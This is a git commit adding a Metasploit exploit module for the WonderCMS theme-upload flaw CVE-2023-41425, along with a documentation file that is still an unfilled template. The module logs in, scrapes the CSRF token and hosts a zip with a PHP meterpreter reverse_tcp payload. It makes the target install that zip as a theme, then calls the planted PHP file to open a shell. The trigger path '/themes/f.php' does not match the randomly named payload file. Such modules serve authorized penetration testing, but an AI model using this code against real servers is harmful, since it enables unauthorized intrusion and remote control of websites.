Module init

msutovsky-r7 · msutovsky-r7 · commit 665065e4dfc3 · 2025-04-25T14:35:24.000+02:00
diff --git a/documentation/modules/exploit/multi/http/wondercms_rce.md b/documentation/modules/exploit/multi/http/wondercms_rce.md
@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### Option Name
+
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Version and OS
+
+```
+code or console output
+```
+
+For example:
+
+To do this specific thing, here's how you do it:
+
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```
diff --git a/modules/exploits/multi/http/wondercms_rce.rb b/modules/exploits/multi/http/wondercms_rce.rb
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WonderCMS Remote Code Execution',
+        'Description' => %q{
+          This module adds exploit for CVE-2023-41425. The WonderCMS is simple, free and open-source management system. It contains file upload vulnerability in version 3.2.0 up to version 3.4.2, which allows authenticated users to upload malicious zip file, which gets parsed into theme directory. This vulnerability can be used to upload malicious PHP file.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['msutovsky-r7'],
+        'References' => [
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-41425'],
+          [ 'CVE', '2023-41425']
+        ],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2023-11-07',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the WonderCMS application', '/wondercms']),
+      OptString.new('PASSWORD', [true, 'Password to log into WonderCMS', ''])
+    ])
+  end
+
+  def login
+    return if @logged_in
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/loginURL'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'password' => datastore['PASSWORD']
+      }
+    })
+
+    fail_with(Failure::NoAccess, 'Incorrect credentials') unless res&.code == 302 && !res.headers&.fetch('Location', '')&.include?('loginURL')
+
+    @logged_in = true
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/how-to')
+    })
+    return Exploit::CheckCode::Unknown('Cannot connect to WonderCMS server') unless res&.code == 200
+
+    return Exploit::CheckCode::Safe('WonderCMS was not detected') unless res.body&.include?('WonderCMS')
+
+    vprint_status('Target is probably WonderCMS..')
+
+    login
+
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return Exploit::CheckCode::Unknown('Failed to connect') unless res&.code == 200
+
+    html_document = res.get_html_document
+
+    html_document.xpath('//a').find { |link| link.text =~ /WonderCMS (\d.\d?\d?.\d?\d?)/ }
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Unknown('Unable to get version') unless version
+
+    return Msf::Exploit::CheckCode::Safe("WonderCMS #{version} is not affected") unless version <= Rex::Version.new('3.4.2') && version >= Rex::Version.new('3.2.0')
+
+    return Exploit::CheckCode::Vulnerable("Version #{version} is affected")
+  end
+
+  def create_vulnerable_zip
+    @payload_filename = "#{Rex::Text.rand_text_alphanumeric(3..12)}.php"
+    files =
+      [
+        { data: payload.encoded, fname: @payload_filename }
+      ]
+
+    @vuln_zip = Msf::Util::EXE.to_zip(files)
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Received request, sending payload..')
+    send_response(cli, @vuln_zip)
+  end
+
+  def install_malicious_component
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return Exploit::CheckCode::Unknown('Failed to connect') unless res&.code == 200
+
+    html_document = res.get_html_document
+    @token = html_document.at("input[@name='token']").attributes.fetch('value', nil)
+
+    return Exploit::CheckCode::Unknown('Failed to get token') unless @token
+
+    send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=violet&type=themes&token=#{@token}")
+    })
+  end
+
+  def exploit
+    login
+
+    create_vulnerable_zip
+
+    @zip_filename = "#{Rex::Text.rand_text_alphanumeric(4..8)}.zip"
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => "/#{@zip_filename}"
+      }
+    })
+
+    install_malicious_component
+
+    send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/themes/f.php')
+    })
+  end
+end
